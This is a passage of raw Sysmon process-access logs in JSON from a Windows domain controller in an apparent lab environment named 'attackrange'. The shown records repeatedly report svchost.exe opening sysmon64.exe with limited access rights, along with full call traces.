05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3234,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3235,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3236,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3237,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3238,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3239,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3240,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3241,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 